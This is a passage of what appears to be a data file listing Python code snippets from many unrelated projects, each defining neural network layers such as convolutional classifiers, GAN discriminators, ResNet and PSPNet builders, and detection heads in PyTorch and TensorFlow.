end_range=0.75)}\n }, mutation_chance=0.08),\n\n \"out_features\": Mutagen(value_type=ValueType.WHOLE_NUMBERS, current_value=conv_out_features, start_range=1,\n end_range=100, name=\"num out features\", mutation_chance=0.22,\n distance_weighting=Props.LAYER_SIZE_COEFFICIENT if Config.allow_attribute_distance else 0)\n }\n\n if use_linears and not use_convs:\n self.layer_type = Mutagen(nn.Linear, discreet_value=nn.Linear,\n distance_weighting=Props.LAYER_TYPE_COEFFICIENT if Config.allow_attribute_distance else 0,\n sub_mutagens={nn.Linear: linear_submutagens}\n )\n if use_convs and not use_linears:\n self.layer_type = Mutagen(nn.Conv2d, discreet_value=nn.Conv2d,\n distance_weighting=Props.LAYER_TYPE_COEFFICIENT if Config.allow_attribute_distance else 0,\n sub_mutagens={nn.Conv2d: conv_submutagens})\n if use_convs and use_linears:\n self.layer_type = Mutagen(nn.Conv2d, nn.Linear, discreet_value=layer_type,\n distance_weighting=Props.LAYER_TYPE_COEFFICIENT if Config.allow_attribute_distance else 0,\n sub_mutagens={\n nn.Conv2d: conv_submutagens,\n nn.Linear: linear_submutagens\n }, name=\"deep layer type\", mutation_chance=0.08)", "def _init_layers(self):\n self.relu = nn.ReLU(inplace=True)\n self.cls_convs = nn.ModuleList()\n self.reg_convs = nn.ModuleList()\n for i in range(self.stacked_convs):\n chn = self.in_channels if i == 0 else self.feat_channels\n self.cls_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=dict(type='DCN', deform_groups=1)\n if i == 0 and self.use_dcn else self.conv_cfg,\n norm_cfg=self.norm_cfg))\n self.reg_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=dict(type='DCN', deform_groups=1)\n if i == 0 and self.use_dcn else self.conv_cfg,\n norm_cfg=self.norm_cfg))\n self.atss_cls = nn.Conv2d(\n self.feat_channels,\n self.num_base_priors * self.cls_out_channels,\n 3,\n padding=1)\n self.atss_reg = nn.Conv2d(\n self.feat_channels, self.num_base_priors * 4, 3, padding=1)\n self.atss_iou = nn.Conv2d(\n self.feat_channels, self.num_base_priors * 1, 3, padding=1)\n self.scales = nn.ModuleList(\n [Scale(1.0) for _ in self.prior_generator.strides])\n\n # we use the global list in loss\n self.cls_num_pos_samples_per_level = [\n 0. for _ in range(len(self.prior_generator.strides))\n ]\n self.reg_num_pos_samples_per_level = [\n 0. for _ in range(len(self.prior_generator.strides))\n ]", "def trainNet():", "def arch(self, nn) -> 'final node of the tensor flow graph (y_conv)':\n\n print(self)\n\n # first conv. layer \n # 5x5 filter, 1 input channel, 32 output channels\n W_conv1 = nn.weight_variable([5, 5, 1, 32])\n b_conv1 = nn.bias_variable([32])\n stride1 = 1\n h_conv1 = tf.nn.relu(nn.conv2d(nn.x_image, W_conv1, stride1, 'VALID') + b_conv1) \n # outputs a 24x24x32 image\n \n # first pooling layer (2x2) \n h_pool1 = nn.max_pool_2x2(h_conv1) \n # outputs a 12x12x32 image\n\n # second conv. layer \n # 3x3 filter, 32 input channel, 32 output channels\n W_conv2 = nn.weight_variable([3, 3, 32, 32])\n b_conv2 = nn.bias_variable([32])\n stride2 = 1\n h_conv2 = tf.nn.relu(nn.conv2d(h_pool1, W_conv2, stride2, 'VALID') + b_conv2)\n # outputs a 10x10x32 image\n\n # third conv. 
layer\n # 3x3 filter, 32 input channel, 32 output channels\n W_conv3 = nn.weight_variable([3, 3, 32, 32])\n b_conv3 = nn.bias_variable([32])\n stride3 = 1\n h_conv3 = tf.nn.relu(nn.conv2d(h_conv2, W_conv3, stride3, 'VALID') + b_conv3)\n # outputs a 8x8x32 image\n\n # reshape (flatten) output\n h_conv3_flat = tf.reshape(h_conv3, [-1, 8*8*32])\n\n # first fully connected layer\n W_fc1 = nn.weight_variable([8 * 8 * 32, 1024])\n b_fc1 = nn.bias_variable([1024])\n h_fc1 = tf.nn.relu(tf.matmul(h_conv3_flat, W_fc1) + b_fc1)\n\n # dropout\n h_fc1_drop = tf.nn.dropout(h_fc1, nn.keep_prob)\n\n # second (final) fully connected layer (softmax)\n W_fc2 = nn.weight_variable([1024, 10])\n b_fc2 = nn.bias_variable([10])\n y_conv=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n return y_conv", "def __init__(self):\n super().__init__()\n \n # convolutional layers\n self.conv1 = nn.Conv2d(1, 16, kernel_size=3) # 16x(14-2)x(14-2) = 16x12x12\n self.conv2 = nn.Conv2d(16, 32, kernel_size=3) # 32x10x10 => pooling = 32x5x5\n \n # fully connected layers\n self.fc1 = nn.Linear(32 * 5 * 5, 64)\n self.fc2 = nn.Linear(64, 10)\n self.fc3 = nn.Linear(20, 10)\n self.fc4 = nn.Linear(10, 1)\n \n # regularizers\n self.drop = nn.Dropout(0.1)\n self.drop2d = nn.Dropout2d(0.1)\n self.pool = nn.MaxPool2d(kernel_size=2)\n self.bn2d = nn.BatchNorm2d(16, affine=False)\n self.bn = nn.BatchNorm1d(64, affine=False)\n\n # activation functions\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n \n # Initialize weights\n self.apply(self.weights_init)", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(FCNDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n # sequence += [\n # nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n # norm_layer(ndf * nf_mult),\n # nn.LeakyReLU(0.2, True)\n # ]\n self.model = nn.Sequential(*sequence)\n # sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.fcn = nn.Sequential(nn.ConvTranspose2d(ndf*nf_mult, 1, kernel_size=32, stride=32, padding=0),\n nn.Sigmoid()\n )\n self.downConv = nn.Sequential(\n nn.Conv2d(ndf * nf_mult, ndf * nf_mult, kernel_size=4, stride=2, padding=1, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True),\n nn.Conv2d(ndf * nf_mult, ndf * nf_mult, kernel_size=4, stride=1, padding=0, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True),\n nn.Conv2d(ndf * nf_mult, 1, kernel_size=3, stride=1, padding=padw)\n )", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d, no_antialias=True):\n super(NLayerDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func == 
nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n if(no_antialias):\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n else:\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=1, padding=padw), nn.LeakyReLU(0.2, True), Downsample(ndf)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n if(no_antialias):\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n else:\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True),\n Downsample(ndf * nf_mult)]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.model = nn.Sequential(*sequence)", "def build_resnet50(self):\n use_batch_norm = self.use_batch_norm\n\n imgs = tf.placeholder(tf.float32, [self.batch_size]+self.img_shape)\n is_train = tf.placeholder(tf.bool)\n\n conv1_feats = convolution(imgs, 7, 7, 64, 2, 2, 'conv1')\n conv1_feats = batch_norm(conv1_feats, 'bn_conv1', is_train, use_batch_norm)\n conv1_feats = nonlinear(conv1_feats, 'relu')\n pool1_feats = max_pool(conv1_feats, 3, 3, 2, 2, 'pool1')\n\n res2a_feats = self.basic_block(pool1_feats, 'res2a', 'bn2a', is_train, use_batch_norm, 64, 1)\n res2b_feats = self.basic_block2(res2a_feats, 'res2b', 'bn2b', is_train, use_batch_norm, 64)\n res2c_feats = self.basic_block2(res2b_feats, 'res2c', 'bn2c', is_train, use_batch_norm, 64)\n \n res3a_feats = self.basic_block(res2c_feats, 'res3a', 'bn3a', is_train, use_batch_norm, 128)\n res3b_feats = self.basic_block2(res3a_feats, 'res3b', 'bn3b', is_train, use_batch_norm, 128)\n res3c_feats = self.basic_block2(res3b_feats, 'res3c', 'bn3c', is_train, use_batch_norm, 128)\n res3d_feats = self.basic_block2(res3c_feats, 'res3d', 'bn3d', is_train, use_batch_norm, 128)\n\n res4a_feats = self.basic_block(res3d_feats, 'res4a', 'bn4a', is_train, use_batch_norm, 256)\n res4b_feats = self.basic_block2(res4a_feats, 'res4b', 'bn4b', is_train, use_batch_norm, 256)\n res4c_feats = self.basic_block2(res4b_feats, 'res4c', 'bn4c', is_train, use_batch_norm, 256)\n res4d_feats = self.basic_block2(res4c_feats, 'res4d', 'bn4d', is_train, use_batch_norm, 256)\n res4e_feats = self.basic_block2(res4d_feats, 'res4e', 'bn4e', is_train, use_batch_norm, 256)\n res4f_feats = self.basic_block2(res4e_feats, 'res4f', 'bn4f', is_train, use_batch_norm, 256)\n\n res5a_feats = self.basic_block(res4f_feats, 'res5a', 'bn5a', is_train, use_batch_norm, 512)\n res5b_feats = self.basic_block2(res5a_feats, 'res5b', 'bn5b', is_train, use_batch_norm, 512)\n res5c_feats = self.basic_block2(res5b_feats, 'res5c', 'bn5c', is_train, use_batch_norm, 512)\n\n res5c_feats_flat = tf.reshape(res5c_feats, [self.batch_size, 49, 2048])\n self.conv_feats = res5c_feats_flat\n self.conv_feat_shape = [49, 2048]\n self.num_ctx = 49 \n self.dim_ctx = 2048\n\n self.imgs = imgs\n self.is_train = is_train", "def __init__(self, n_channels_in: int = 3, 
n_channels_out: int = 3, n_hidden: int = 64,\n norm_layer: nn.Module = nn.BatchNorm2d, use_dropout: bool = True,\n n_hidden_layers: int = 3, padding_type: str = 'reflect', temperature: float = 1,\n device: str = \"cpu\", **kwargs):\n super(ToyCalNet, self).__init__(n_channels_in, n_channels_out, device, **kwargs)\n\n # save for use in forward pass\n self.temperature = temperature\n\n # If normalizing layer is instance normalization, add bias\n # use_bias = norm_layer == nn.InstanceNorm2d\n use_bias = True\n use_dropout = True\n\n\n # Initialize model input block\n layers = []\n\n # Add input block layers\n layers += [nn.ReflectionPad2d(1)]\n layers += [nn.Conv2d(n_channels_in, n_hidden, kernel_size=3, bias=use_bias)]\n\n # layers += [nn.Linear(n_channels_in, n_hidden)]\n\n layers += [nn.Dropout(int(use_dropout) * 0.2)]\n layers += [norm_layer(n_hidden)]\n layers += [nn.LeakyReLU(0.2, inplace=True)]\n\n # Add hidden block layers\n for i in range(n_hidden_layers):\n # Add input block layers\n layers += [nn.ReflectionPad2d(1)]\n layers += [nn.Conv2d(n_hidden, n_hidden, kernel_size=3, bias=use_bias)]\n\n # layers += [nn.Linear(n_hidden, n_hidden)]\n\n layers += [nn.Dropout(int(use_dropout) * 0.2)]\n layers += [norm_layer(n_hidden)]\n layers += [nn.LeakyReLU(0.2, inplace=True)]\n\n layers += [nn.ReflectionPad2d(1)]\n layers += [nn.Conv2d(n_hidden, n_channels_out, kernel_size=3)]\n\n # layers += [nn.Linear(n_hidden, n_channels_out)]\n\n layers += [nn.Dropout(int(use_dropout) * 0.2)]\n # layers += [nn.Softmax(dim=1)]\n\n # Save model\n self.model = nn.Sequential(*layers)", "def forward(self, feats_S, feats_T):\n losses = 0.\n for s, t in zip(feats_S, feats_T): # B,C,1/16\n t = t.detach() # context path feature\n B, C, H, W = t.shape\n # patch_h, patch_w = H // 2, W // 2 # max_pool 到 2x2 计算\n patch_h, patch_w = H // 4, W // 4 # 控制输出 feature map 的大小\n # todo: 可以考虑调小 pool size\n maxpool = nn.MaxPool2d(kernel_size=(patch_w, patch_h), stride=(patch_w, patch_h),\n padding=0, ceil_mode=True)\n loss = self.criterion(maxpool(s), maxpool(t)) # 2x2\n losses += loss\n return losses", "def _init_layers(self) -> None:\n self.relu = nn.ReLU(inplace=True)\n self.cls_convs = nn.ModuleList()\n self.reg_convs = nn.ModuleList()\n for i in range(self.stacked_convs):\n chn = self.in_channels if i == 0 else self.feat_channels\n self.cls_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg))\n self.reg_convs.append(\n ConvModule(\n chn,\n self.feat_channels,\n 3,\n stride=1,\n padding=1,\n conv_cfg=self.conv_cfg,\n norm_cfg=self.norm_cfg))\n pred_pad_size = self.pred_kernel_size // 2\n self.atss_cls = nn.Conv2d(\n self.feat_channels,\n self.num_anchors * self.cls_out_channels,\n self.pred_kernel_size,\n padding=pred_pad_size)\n self.atss_reg = nn.Conv2d(\n self.feat_channels,\n self.num_base_priors * 4,\n self.pred_kernel_size,\n padding=pred_pad_size)\n self.atss_centerness = nn.Conv2d(\n self.feat_channels,\n self.num_base_priors * 1,\n self.pred_kernel_size,\n padding=pred_pad_size)\n self.scales = nn.ModuleList(\n [Scale(1.0) for _ in self.prior_generator.strides])", "def cnn_model_fn(features):\n print(\"features shape\", features.shape)\n\n input_layer = tf.reshape(features, [-1, 28, 28, 1])\n\n conv1 = tf.layers.conv2d(inputs=input_layer, filters=64, kernel_size=[3, 3], padding=\"same\", activation=tf.nn.relu)\n print(conv1)\n pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2, padding=\"same\")\n 
print(pool1)\n conv2 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=[3, 3], padding=\"same\", activation=tf.nn.relu)\n print(conv2)\n pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2, padding=\"same\")\n print(pool2)\n conv3 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=[3, 3], padding=\"same\", activation=tf.nn.relu)\n print(conv3)\n conv4 = tf.layers.conv2d(inputs=conv3, filters=256, kernel_size=[3, 3], padding=\"same\", activation=tf.nn.relu)\n print(conv4)\n pool3 = tf.layers.max_pooling2d(inputs=conv4, pool_size=[2, 2], strides=2, padding=\"same\")\n print(pool3)\n pool3_flat = tf.reshape(pool3, [-1, 4 * 4 * 256])\n print(pool3_flat)\n fc1 = tf.layers.dense(inputs=pool3_flat, units=1024, activation=tf.nn.relu)\n print(fc1)\n fc2 = tf.layers.dense(inputs=fc1, units=1024, activation=tf.nn.relu)\n print(fc2)\n fc2_bn = tf.nn.batch_normalization(x=fc2, mean=0, variance=1, scale=1, offset=0, variance_epsilon=1e-6)\n print(fc2_bn)\n fc3 = tf.layers.dense(inputs=fc2_bn, units=10)\n print(fc3)\n return fc3", "def __init__(self, **kwargs):\n super().__init__()\n self.model_conv = models.resnet50(pretrained=True)\n for param in self.model_conv.parameters():\n param.requires_grad = False\n num_ftrs = self.model_conv.fc.in_features\n num_classes = 10\n self.model_conv.fc = nn.Linear(num_ftrs, num_classes)", "def __init__(self, input_size, nb_action):\r\n super(Network, self).__init__()\r\n self.input_size = input_size\r\n self.nb_action = nb_action\r\n \r\n #Connection with input layer and hidden layer\r\n self.fc1 = nn.Linear(input_size, 30)\r\n #Connection with hidden layer and output layer\r\n self.fc2 = nn.Linear(30, nb_action)", "def __init__(self, classes=2622):\n super().__init__()\n self.conv1 = _ConvBlock(3, 64, 64)\n self.conv2 = _ConvBlock(64, 128, 128)\n self.conv3 = _ConvBlock(128, 256, 256, 256)\n self.conv4 = _ConvBlock(256, 512, 512, 512)\n self.conv5 = _ConvBlock(512, 512, 512, 512)\n self.dropout = torch.nn.Dropout(0.5)\n self.fc1 = torch.nn.Linear(7 * 7 * 512, 4096)\n self.fc2 = torch.nn.Linear(4096, 4096)\n self.fc3 = torch.nn.Linear(4096, classes)", "def __init__(self):\n super(Match3DNet, self).__init__()\n self.features = nn.Sequential(\n # conv1\n nn.Conv3d(1, 64, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv2\n nn.Conv3d(64, 64, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # maxpool\n nn.MaxPool3d(kernel_size=2, stride=2),\n # conv3\n nn.Conv3d(64, 128, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv4\n nn.Conv3d(128, 128, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv5\n nn.Conv3d(128, 256, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv6\n nn.Conv3d(256, 256, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv7\n nn.Conv3d(256, 512, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n # conv8\n nn.Conv3d(512, 512, kernel_size=3, stride=1, padding=0),\n nn.ReLU(inplace=True),\n )", "def Classify(x, reuse=False, keepProb=1.0,isNankai=False):\n with tf.variable_scope('Classify') as scope: \n if reuse:\n scope.reuse_variables()\n \n # 1st layer\n w1 = weight_variable('w1',[dInput,nHidden])\n bias1 = bias_variable('bias1',[nHidden])\n h1 = fc_relu(x,w1,bias1,keepProb)\n \n # 2nd layer\n w2 = weight_variable('w2',[nHidden,nHidden2])\n bias2 = bias_variable('bias2',[nHidden2])\n h2 = fc_relu(h1,w2,bias2,keepProb) \n \n # 3nd layer\n w3 = weight_variable('w3',[nHidden2,nHidden3])\n bias3 = 
bias_variable('bias3',[nHidden3])\n h3 = fc_relu(h2,w3,bias3,keepProb) \n\n \n # Toy\n if dataMode == 0:\n # 3rd layar\n w3 = weight_variable('w3',[nHidden2,nClass])\n bias3 = bias_variable('bias3',[nClass])\n y = fc(h2,w3,bias3,keepProb)\n # Nankai\n else:\n # 4th layer\n w4_1 = weight_variable('w4_1',[nHidden3,nClass])\n bias4_1 = bias_variable('bias4_1',[nClass])\n \n w4_2 = weight_variable('w4_2',[nHidden3,nClass])\n bias4_2 = bias_variable('bias4_2',[nClass])\n \n w4_3 = weight_variable('w4_3',[nHidden3,nClass])\n bias4_3 = bias_variable('bias4_3',[nClass])\n \n y1 = fc(h3,w4_1,bias4_1,keepProb)\n y2 = fc(h3,w4_2,bias4_2,keepProb)\n y3 = fc(h3,w4_3,bias4_3,keepProb)\n # [number of data, number of class, cell(=3)]\n y = tf.concat((tf.expand_dims(y1,2),tf.expand_dims(y2,2),tf.expand_dims(y3,2)),2)\n \n # shape=[None,number of class]\n return y", "def make_model(self, inputs, is_training):\n with tf.variable_scope('ResNet50'):\n x = conv2d(inputs, 64, [7, 7], strides=[1, 2, 2, 1], name='conv1') # size 1/2\n x = bn(x, is_training)\n x = relu(x)\n x = max_pool(x, ksize=[1, 3, 3, 1], name='pool1') # size 1/4\n\n x = self.conv_block(x, [64, 64, 256], '2_1', is_training, s=1)\n x = self.identity_block(x, [64, 64, 256], '2_2', is_training)\n x = self.identity_block(x, [64, 64, 256], '2_3', is_training)\n\n x = self.conv_block(x, [128, 128, 512], '3_1', is_training)\n x = self.identity_block(x, [128, 128, 512], '3_2', is_training)\n x = self.identity_block(x, [128, 128, 512], '3_3', is_training)\n\n x = self.atrous_conv_block(x, [256, 256, 1024], '4_1', 2, is_training, s=1)\n x = self.atrous_identity_block(x, [256, 256, 1024], '4_2', 2, is_training)\n x = self.atrous_identity_block(x, [256, 256, 1024], '4_3', 2, is_training)\n x = self.atrous_identity_block(x, [256, 256, 1024], '4_4', 2, is_training)\n x = self.atrous_identity_block(x, [256, 256, 1024], '4_5', 2, is_training)\n x = self.atrous_identity_block(x, [256, 256, 1024], '4_6', 2, is_training)\n\n x = self.atrous_conv_block(x, [512, 512, 2048], '5_1', 4, is_training, s=1)\n x = self.atrous_identity_block(x, [512, 512, 2048], '5_2', 4, is_training)\n x = self.atrous_identity_block(x, [512, 512, 2048], '5_3', 4, is_training)\n\n\n\n \"\"\"\n Astrous Pyrimid Pooling. 
Decoder\n        \"\"\"\n        with tf.variable_scope('ASPP'):\n            feature_map_shape = x.get_shape().as_list()\n\n            # global average pooling\n            # average the feature map over its height and width\n            feature_map = tf.reduce_mean(x, [1, 2], keepdims=True)\n\n            feature_map = conv2d(feature_map, 256, [1, 1], name='gap_feature_map')\n            feature_map = tf.image.resize_bilinear(feature_map, [feature_map_shape[1], feature_map_shape[2]])\n\n            rate1 = conv2d(x, 256, [1, 1], name='rate1')\n            rate6 = atrous_conv2d(x, 256, [3, 3], rate=6, name='rate6')\n            rate12 = atrous_conv2d(x, 256, [3, 3], rate=12, name='rate12')\n            rate18 = atrous_conv2d(x, 256, [3, 3], rate=18, name='rate18')\n\n            concated = tf.concat([feature_map, rate1, rate6, rate12, rate18], axis=3)\n\n            net = conv2d(concated, 256, [1, 1], name='net')\n\n            logits = conv2d(net, self.N_CLASS, [1, 1], name='logits')\n            logits = tf.image.resize_bilinear(logits, size=[self.RESIZE, self.RESIZE], name='out')\n\n            pred = tf.argmax(logits, axis=3)\n            pred = tf.expand_dims(pred, dim=3)\n\n            return logits, pred", "def __init__(self):\n        super(Generator, self).__init__()\n\n        # output feature map will have the size of 8x8\n        self.first_deconv = TransitionUp(in_channels=3, out_channels=256, stride=2, padding=1, kernel_size=4)\n        self.first_batch_norm = nn.BatchNorm2d(256)\n\n        # output feature map will have the size of 16x16\n        self.second_deconv = TransitionUp(in_channels=256, out_channels=128, stride=2, padding=1, kernel_size=4)\n        self.second_batch_norm = nn.BatchNorm2d(128)\n\n        # output feature map will have the size of 32x32\n        self.third_deconv = TransitionUp(in_channels=128, out_channels=32, stride=2, padding=1, kernel_size=4)\n        self.third_batch_norm = nn.BatchNorm2d(32)\n\n        # output feature map will have the size of 64x64\n        self.fourth_deconv = TransitionUp(in_channels=32, out_channels=16, stride=2, padding=1, kernel_size=4)\n        self.fourth_batch_norm = nn.BatchNorm2d(16)\n\n        # output feature map will have the size of 128x128\n        self.fifth_deconv = TransitionUp(in_channels=16, out_channels=16, stride=1, padding=1, kernel_size=4)\n        self.fifth_batch_norm = nn.BatchNorm2d(16)\n\n        # output feature map will have the size of 128x128\n        self.sixth_deconv = TransitionUp(in_channels=16, out_channels=16, stride=1, padding=1, kernel_size=4)\n        self.sixth_batch_norm = nn.BatchNorm2d(16)\n\n        # output feature map will have the size of 128x128\n        self.seventh_deconv = TransitionUp(in_channels=16, out_channels=3, stride=1, padding=1, kernel_size=4)", "def __init__(self):\n        super(SimpleNet, self).__init__()\n\n        self.conv_layers = None\n        self.fc_layers = None\n        self.loss_criterion = None\n\n        #######################################################################\n        # Student code begins\n        #######################################################################\n\n        self.conv_layers = nn.Sequential(\n            nn.Conv2d(1, 10, kernel_size=5, stride=1),\n            nn.ReLU(),\n            nn.MaxPool2d(3),\n            nn.Conv2d(10, 20, kernel_size=5, stride=1),\n            nn.ReLU(),\n            nn.MaxPool2d(3)\n        )\n\n        conv_out = int(20*5*5)\n\n        self.fc_layers = nn.Sequential(\n            nn.Linear(conv_out, 100),\n            nn.Linear(100, 15)\n        )\n\n        self.loss_criterion = nn.MSELoss(reduction='mean')\n\n        #######################################################################\n        # Student code ends\n        #######################################################################", "def arch(self, nn) -> 'final node of the tensor flow graph (y_conv)':\n\n        print(self)\n\n        # first conv. 
layer \n # 5x5 filter, 1 input channel, 32 output channels\n W_conv1 = nn.weight_variable([5, 5, 1, 32])\n b_conv1 = nn.bias_variable([32])\n stride1 = 1\n h_conv1 = tf.nn.relu(nn.conv2d(nn.x_image, W_conv1, stride1) + b_conv1)\n \n # first pooling layer (2x2) \n h_pool1 = nn.max_pool_2x2(h_conv1)\n\n # second conv. layer \n # 5x5 filter, 32 input channel, 64 output channels\n W_conv2 = nn.weight_variable([5, 5, 32, 64])\n b_conv2 = nn.bias_variable([64])\n stride2 = 1\n h_conv2 = tf.nn.relu(nn.conv2d(h_pool1, W_conv2, stride2) + b_conv2)\n\n # second pooling layer (2x2) \n h_pool2 = nn.max_pool_2x2(h_conv2)\n\n # reshape (flatten) output\n h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])\n\n # first fully connected layer\n W_fc1 = nn.weight_variable([7 * 7 * 64, 1024])\n b_fc1 = nn.bias_variable([1024])\n h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n # dropout\n h_fc1_drop = tf.nn.dropout(h_fc1, nn.keep_prob)\n\n # second (final) fully connected layer (softmax)\n W_fc2 = nn.weight_variable([1024, 10])\n b_fc2 = nn.bias_variable([10])\n y_conv=tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n return y_conv", "def _pspnet_builder(xs,\n name,\n cnn_fn,\n num_classes,\n is_training,\n use_global_status,\n reuse=False):\n # Ensure that the size of input data is valid (should be multiple of 6x8=48).\n h, w = xs[0].get_shape().as_list()[1:3] # NxHxWxC\n assert(h%48 == 0 and w%48 == 0 and h == w)\n\n # Build the base network.\n xs = cnn_fn(xs, name, is_training, use_global_status, reuse)\n\n with tf.variable_scope(name, reuse=reuse) as scope:\n # Build the PSP module\n pool_k = int(h/8) # the base network is stride 8 by default.\n\n # Build pooling layer results in 1x1 output.\n pool1s = avg_pools(xs,\n 'block5/pool1',\n pool_k,\n pool_k,\n 'VALID')\n pool1s = nn_mgpu.conv(pool1s,\n 'block5/pool1/conv1',\n 512,\n 1,\n 1,\n padding='SAME',\n biased=False,\n bn=True,\n relu=True,\n is_training=is_training,\n decay=0.99,\n use_global_status=use_global_status)\n pool1s = upsample_bilinears(pool1s, pool_k, pool_k)\n\n # Build pooling layer results in 2x2 output.\n pool2s = avg_pools(xs,\n 'block5/pool2',\n pool_k//2,\n pool_k//2,\n 'VALID')\n pool2s = nn_mgpu.conv(pool2s,\n 'block5/pool2/conv1',\n 512,\n 1,\n 1,\n padding='SAME',\n biased=False,\n bn=True,\n relu=True,\n is_training=is_training,\n decay=0.99,\n use_global_status=use_global_status)\n pool2s = upsample_bilinears(pool2s, pool_k, pool_k)\n\n # Build pooling layer results in 3x3 output.\n pool3s = avg_pools(xs,\n 'block5/pool3',\n pool_k//3,\n pool_k//3,\n 'VALID')\n pool3s = nn_mgpu.conv(pool3s,\n 'block5/pool3/conv1',\n 512,\n 1,\n 1,\n padding='SAME',\n biased=False,\n bn=True,\n relu=True,\n is_training=is_training,\n decay=0.99,\n use_global_status=use_global_status)\n pool3s = upsample_bilinears(pool3s, pool_k, pool_k)\n\n # Build pooling layer results in 6x6 output.\n pool6s = avg_pools(xs,\n 'block5/pool6',\n pool_k//6,\n pool_k//6,\n 'VALID')\n pool6s = nn_mgpu.conv(pool6s,\n 'block5/pool6/conv1',\n 512,\n 1,\n 1,\n padding='SAME',\n biased=False,\n bn=True,\n relu=True,\n is_training=is_training,\n decay=0.99,\n use_global_status=use_global_status)\n pool6s = upsample_bilinears(pool6s, pool_k, pool_k)\n\n # Fuse the pooled feature maps with its input, and generate\n # segmentation prediction.\n xs = nn_mgpu.concat(\n [pool1s, pool2s, pool3s, pool6s, xs],\n name='block5/concat',\n axis=3)\n xs = nn_mgpu.conv(xs,\n 'block5/conv2',\n 512,\n 3,\n 1,\n padding='SAME',\n biased=False,\n bn=True,\n relu=True,\n 
is_training=is_training,\n decay=0.99,\n use_global_status=use_global_status)\n xs = nn_mgpu.conv(xs,\n 'block5/fc1_voc12',\n num_classes,\n 1,\n 1,\n padding='SAME',\n biased=True,\n bn=False,\n relu=False,\n is_training=is_training)\n\n return xs", "def __init__(\n self, config: SimpleGCNConfig = SimpleGCNConfig(name=\"simplegcn\")\n ):\n super().__init__()\n self.edge_lengthscale = config.edge_lengthscale\n self.weight_edges = config.weight_edges\n\n self.atom_embedding = nn.Linear(\n config.atom_input_features, config.width\n )\n\n self.layer1 = GraphConv(config.width, config.width)\n self.layer2 = GraphConv(config.width, config.output_features)\n self.readout = AvgPooling()", "def get_trans_net():\n return nn.Sequential(nn.Linear(2, 64), nn.LeakyReLU(), nn.Linear(64, 64), nn.LeakyReLU(), nn.Linear(64, 2))", "def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(NLayerDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d 